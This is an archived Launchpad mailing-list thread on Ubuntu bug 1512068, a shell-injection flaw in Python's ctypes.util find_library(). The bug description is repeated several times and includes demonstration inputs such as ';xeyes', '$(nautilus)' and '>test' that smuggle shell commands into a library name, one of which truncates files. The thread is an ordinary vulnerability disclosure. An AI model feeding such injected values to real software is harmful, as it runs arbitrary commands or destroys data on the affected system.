  ^CTraceback (most recent call last):
File "", line 1, in 
File "/usr/lib/python3.4/ctypes/util.py", line 244, in find_library
  return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name))
File "/usr/lib/python3.4/ctypes/util.py", line 99, in _findLib_gcc
  trace = f.read()
  KeyboardInterrupt

  ProblemType: Bug
  DistroRelease: Ubuntu 15.10
  Package: libpython2.7-stdlib 2.7.10-4ubuntu1
  ProcVersionSignature: Ubuntu 4.2.0-16.19-generic 4.2.3
  Uname: Linux 4.2.0-16-generic x86_64
  ApportVersion: 2.19.1-0ubuntu4
  Architecture: amd64
  CurrentDesktop: XFCE
  Date: Sun Nov  1 10:34:38 2015
  InstallationDate: Installed on 2015-10-09 (22 days ago)
  InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Alpha amd64 (20151009)
  SourcePackage: python2.7
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/python2.7/+bug/1512068/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2015-11-28 Thread Bernd Dietzel

Seens the bug is already known and fixed since 2014 but found not its way to 
ubuntu repos.
http://bugs.python.org/issue22636


** Information type changed from Private Security to Public Security

** Bug watch added: Python Roundup #22636
   http://bugs.python.org/issue22636

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to python2.7 in Ubuntu.
https://bugs.launchpad.net/bugs/1512068

Title:
  Python ctypes.util , Shell Injection in find_library()

Status in python2.7 package in Ubuntu:
  New

Bug description:
  https://github.com/Legrandin/ctypes/issues/1

  The find_library() function can execute code when special chars like ;|`<>$ 
are in the name.
  The "os.popen()" calls in the util.py script should be replaced with 
"subprocess.Popen()".

  Demo Exploits for Linux :
  

  >>> from ctypes.util import find_library
  >>> find_library(";xeyes")# runs  xeyes 
  >>> find_library("|xterm")# runs terminal
  >>> find_library("")# runs gimp
  >>> find_library("$(nautilus)")  # runs filemanager
  >>> find_library(">test")   # creates, and if exists, 
erases a file "test"

   Traceback 

  >>> find_library("`xmessage hello`")# shows a message, press ctrl+c for 
Traceback
  ^CTraceback (most recent call last):
File "", line 1, in 
File "/usr/lib/python3.4/ctypes/util.py", line 244, in find_library
  return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name))
File "/usr/lib/python3.4/ctypes/util.py", line 99, in _findLib_gcc
  trace = f.read()
  KeyboardInterrupt

  ProblemType: Bug
  DistroRelease: Ubuntu 15.10
  Package: libpython2.7-stdlib 2.7.10-4ubuntu1
  ProcVersionSignature: Ubuntu 4.2.0-16.19-generic 4.2.3
  Uname: Linux 4.2.0-16-generic x86_64
  ApportVersion: 2.19.1-0ubuntu4
  Architecture: amd64
  CurrentDesktop: XFCE
  Date: Sun Nov  1 10:34:38 2015
  InstallationDate: Installed on 2015-10-09 (22 days ago)
  InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Alpha amd64 (20151009)
  SourcePackage: python2.7
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/python2.7/+bug/1512068/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2015-11-28 Thread Ubuntu Foundations Team Bug Bot

The attachment "Patch" seems to be a patch.  If it isn't, please remove
the "patch" flag from the attachment, remove the "patch" tag, and if you
are a member of the ~ubuntu-reviewers, unsubscribe the team.

[This is an automated message performed by a Launchpad user owned by
~brian-murray, for any issues please contact him.]

** Tags added: patch

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to python2.7 in Ubuntu.
https://bugs.launchpad.net/bugs/1512068

Title:
  Python ctypes.util , Shell Injection in find_library()

Status in python2.7 package in Ubuntu:
  New

Bug description:
  https://github.com/Legrandin/ctypes/issues/1

  The find_library() function can execute code when special chars like ;|`<>$ 
are in the name.
  The "os.popen()" calls in the util.py script should be replaced with 
"subprocess.Popen()".

  Demo Exploits for Linux :
  

  >>> from ctypes.util import find_library
  >>> find_library(";xeyes")# runs  xeyes 
  >>> find_library("|xterm")# runs terminal
  >>> find_library("")# runs gimp
  >>> find_library("$(nautilus)")  # runs filemanager
  >>> find_library(">test")   # creates, and if exists, 
erases a file "test"

   Traceback 

  >>> find_library("`xmessage hello`")# shows a message, press ctrl+c for 
Traceback
  ^CTraceback (most recent call last):
File "", line 1, in 
File "/usr/lib/python3.4/ctypes/util.py", line 244, in find_library
  return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name))
File "/usr/lib/python3.4/ctypes/util.py", line 99, in _findLib_gcc
  trace = f.read()
  KeyboardInterrupt

  ProblemType: Bug
  DistroRelease: Ubuntu 15.10
  Package: libpython2.7-stdlib 2.7.10-4ubuntu1
  ProcVersionSignature: Ubuntu 4.2.0-16.19-generic 4.2.3
  Uname: Linux 4.2.0-16-generic x86_64
  ApportVersion: 2.19.1-0ubuntu4
  Architecture: amd64
  CurrentDesktop: XFCE
  Date: Sun Nov  1 10:34:38 2015
  InstallationDate: Installed on 2015-10-09 (22 days ago)
  InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Alpha amd64 (20151009)
  SourcePackage: python2.7
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/python2.7/+bug/1512068/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

2015-11-01 Thread Dimitri John Ledkov

marking as security.

** Information type changed from Public to Private Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to python2.7 in Ubuntu.
https://bugs.launchpad.net/bugs/1512068

Title:
  Python ctypes.util , Shell Injection in find_library()

Status in python2.7 package in Ubuntu:
  New

Bug description:
  https://github.com/Legrandin/ctypes/issues/1

  The find_library() function can execute code when special chars like ;|`<>$ 
are in the name.
  The "os.popen()" calls in the util.py script should be replaced with 
"subprocess.Popen()".

  Demo Exploits for Linux :
  

  >>> from ctypes.util import find_library
  >>> find_library(";xeyes")# runs  xeyes 
  >>> find_library("|xterm")# runs terminal
  >>> find_library("")# runs gimp
  >>> find_library("$(nautilus)")  # runs filemanager
  >>> find_library(">test")   # creates, and if exists, 
erases a file "test"

   Traceback 

  >>> find_library("`xmessage hello`")# shows a message, press ctrl+c for 
Traceback
  ^CTraceback (most recent call last):
File "", line 1, in 
File "/usr/lib/python3.4/ctypes/util.py", line 244, in find_library
  return _findSoname_ldconfig(name) or _get_soname(_findLib_gcc(name))
File "/usr/lib/python3.4/ctypes/util.py", line 99, in _findLib_gcc
  trace = f.read()
  KeyboardInterrupt

  ProblemType: Bug
  DistroRelease: Ubuntu 15.10
  Package: libpython2.7-stdlib 2.7.10-4ubuntu1
  ProcVersionSignature: Ubuntu 4.2.0-16.19-generic 4.2.3
  Uname: Linux 4.2.0-16-generic x86_64
  ApportVersion: 2.19.1-0ubuntu4
  Architecture: amd64
  CurrentDesktop: XFCE
  Date: Sun Nov  1 10:34:38 2015
  InstallationDate: Installed on 2015-10-09 (22 days ago)
  InstallationMedia: Ubuntu 15.10 "Wily Werewolf" - Alpha amd64 (20151009)
  SourcePackage: python2.7
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/python2.7/+bug/1512068/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

[Touch-packages] [Bug 1512068] Re: Python ctypes.util , Shell Injection in find_library()

16 matches

Site Navigation

Mail list logo

Footer information